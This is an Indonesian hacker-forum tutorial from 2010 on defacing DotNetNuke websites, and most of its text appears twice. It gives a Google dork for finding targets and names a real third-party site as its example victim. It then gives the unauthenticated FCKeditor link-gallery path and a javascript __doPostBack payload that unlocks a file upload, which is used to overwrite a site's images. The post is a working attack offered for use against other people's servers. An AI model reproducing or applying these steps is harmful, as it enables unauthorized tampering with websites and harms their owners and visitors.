[Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xploit
Posted: Tue Nov 09, 2010 11:49 am
bikin tutorial lagi ahh...
udah lama juga ane gak bikin tutor, yah walaupun cuma simple dan sederhana... :love:
oke deh, kebanyakan bacot ntar ente pada tidur lagi..
kali neh, ane bakal share cara "menginjeksi" file2 yang terdapat pada suatu website yang VULN dengan Dork yang masih segar dan menggunakan script exploit.
oke tahap pertama yang mesti di siapkan adalah :
1. Browser favorite ente, (kalo ane pake mozilla).
2. NotePad..
3. Kejelian (Ini yang penting).
4. Rokok Sebungkus + Segelas Lemon Tea..
Lanjut.. Pertama kita akan mencari target dulu..
buka browser ente, lalu buka google.
ketikkan perintah/Dork yang masih segar ini sebagai berikut :
contoh seperti pada screenshot di bawah : 
target ane seperti screenshot di atas merupakan salah satu website dari negeri jiran..
(google.com.my emang asoy-ngeboy)..
Buka homepage dari website/target di atas.Lalu periksa setiap gambar yang terletak Pada path :copy dan periksa lokasi/alamat gambar tersebut dan simpan di notepad..
Sebagai contoh panduan target ane di :
Kita cari beberapa file yang paling mudah dulu, contohnya seperti file2 gambar seperti banner,dll..
Dalam kasus ini, ane copy salah satu alamat url gambar yang ada pada halaman ini :
jika pada browser Mozilla, arahkan kursor ke gambar. Lalu klik kanan, dan “copy image location”. Nah, muncullah alamat berikut : Copy-Paste ke notepad url2 image di atas ke notepad. Sekarang nama file gambar saat ini b.JPG.
Selanjutnya, siapkan sebuah gambar baru yang akan kita gunakan untuk menginjeksi/menimpa file yang telah ada. lalu ubah nama gambar baru tersebut dengan nama dan ekstensi yang sama.
Contoh lihat seperti di atas, file tersebut bernama&berekstensi b.JPG. jadi file gambar yang akan kita upload nanti harus bernama+ekstensi yang sama..
Sekarang saatnya kita melakukan tahap2 untuk mengeksploitasi. coba masukkan url berikut :
Cukup copy paste path di atas sehingga menjadi seperti ini :
Dalam kasus ini, ane pastekan linknya target kita tadi sebagai berikut :
lalu muncullah : 
Seperti gambar di atas, ada tiga pilihan pada “Link-Type”..
karena yang bakal injek adalah gambar depannya,
maka pilih pada pilihan ketiga pada “Link-Type” nya. kita pilih file b.JPG..
Setelah memilih pilihan ketiga tersebut "File (A File From Your Site)", ganti URL di bar dgn script di bawah ini :
Lalu Tekan Enter……
Wewww…Setelah menjalankan script java di atas, kita akan melihat pilihan untuk Upload file seperti screenshot di bawah :
Terakhir..Pastikan ente telah merubah namafile+ekstensinya menjadi b.JPG seperti yang telah ane sebutkan sebelumnya di atas, lalu upload lah file tersebut..
Jika sudah, buka homepage dimana lokasi gambar tersebut seperti yang ane lakukan di atas.
Hasilnya : 
Demikian tutorial cupu dan sederhana dari ane..
Regards,
wiLMaR_kiDz | De'SilentAssasin.
Greetz & Thanks to :
De'SilentAssasin team..(7 my friendship, take it easy, I didn't mention your nick here my bro).
Rock4eveR[in heaven], sp1r1t, Zer0Flag, xylitol, bad_boy, faiz@n, Dj_kill3r, vampire, etc..
hanjian_family, jack-, xshadow, gblack, Darkzzzz, bi4kk0b4r, jamesbond007, ^X-Moensen^, etc..
dan semua temen2 yang lupa namanya & belum ane sebutkan…
udah lama juga ane gak bikin tutor, yah walaupun cuma simple dan sederhana... :love:
oke deh, kebanyakan bacot ntar ente pada tidur lagi..
kali neh, ane bakal share cara "menginjeksi" file2 yang terdapat pada suatu website yang VULN dengan Dork yang masih segar dan menggunakan script exploit.
oke tahap pertama yang mesti di siapkan adalah :
1. Browser favorite ente, (kalo ane pake mozilla).
2. NotePad..
3. Kejelian (Ini yang penting).
4. Rokok Sebungkus + Segelas Lemon Tea..
Lanjut.. Pertama kita akan mencari target dulu..
buka browser ente, lalu buka google.
ketikkan perintah/Dork yang masih segar ini sebagai berikut :
Code: Select all
inurl:"/portals/0"target ane seperti screenshot di atas merupakan salah satu website dari negeri jiran..
(google.com.my emang asoy-ngeboy)..
Buka homepage dari website/target di atas.Lalu periksa setiap gambar yang terletak Pada path :
Code: Select all
/portal/0/Sebagai contoh panduan target ane di :
Code: Select all
http://www.metrodriving.com.my/Dalam kasus ini, ane copy salah satu alamat url gambar yang ada pada halaman ini :
Code: Select all
http://www.metrodriving.com.my/Home/tabid/110/Default.aspxCode: Select all
http://www.metrodriving.com.my/Portals/0/MDA/b.JPGSelanjutnya, siapkan sebuah gambar baru yang akan kita gunakan untuk menginjeksi/menimpa file yang telah ada. lalu ubah nama gambar baru tersebut dengan nama dan ekstensi yang sama.
Contoh lihat seperti di atas, file tersebut bernama&berekstensi b.JPG. jadi file gambar yang akan kita upload nanti harus bernama+ekstensi yang sama..
Sekarang saatnya kita melakukan tahap2 untuk mengeksploitasi. coba masukkan url berikut :
Code: Select all
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxCode: Select all
http://www.WebsiteTarget.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxCode: Select all
http://www.metrodriving.com.my/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxSeperti gambar di atas, ada tiga pilihan pada “Link-Type”..
karena yang bakal injek adalah gambar depannya,
maka pilih pada pilihan ketiga pada “Link-Type” nya. kita pilih file b.JPG..
Setelah memilih pilihan ketiga tersebut "File (A File From Your Site)", ganti URL di bar dgn script di bawah ini :
Code: Select all
javascript: __doPostBack ('$ ctlURL cmdUpload','')Lalu Tekan Enter……
Wewww…Setelah menjalankan script java di atas, kita akan melihat pilihan untuk Upload file seperti screenshot di bawah :
Terakhir..Pastikan ente telah merubah namafile+ekstensinya menjadi b.JPG seperti yang telah ane sebutkan sebelumnya di atas, lalu upload lah file tersebut..
Jika sudah, buka homepage dimana lokasi gambar tersebut seperti yang ane lakukan di atas.
Hasilnya :
Code: Select all
http://www.metrodriving.com.my/Home/tabid/110/Default.aspx
http://www.metrodriving.com.my/Portals/0/MDA/b.JPG
Demikian tutorial cupu dan sederhana dari ane..
Regards,
wiLMaR_kiDz | De'SilentAssasin.
Greetz & Thanks to :
De'SilentAssasin team..(7 my friendship, take it easy, I didn't mention your nick here my bro).
Rock4eveR[in heaven], sp1r1t, Zer0Flag, xylitol, bad_boy, faiz@n, Dj_kill3r, vampire, etc..
hanjian_family, jack-, xshadow, gblack, Darkzzzz, bi4kk0b4r, jamesbond007, ^X-Moensen^, etc..
dan semua temen2 yang lupa namanya & belum ane sebutkan…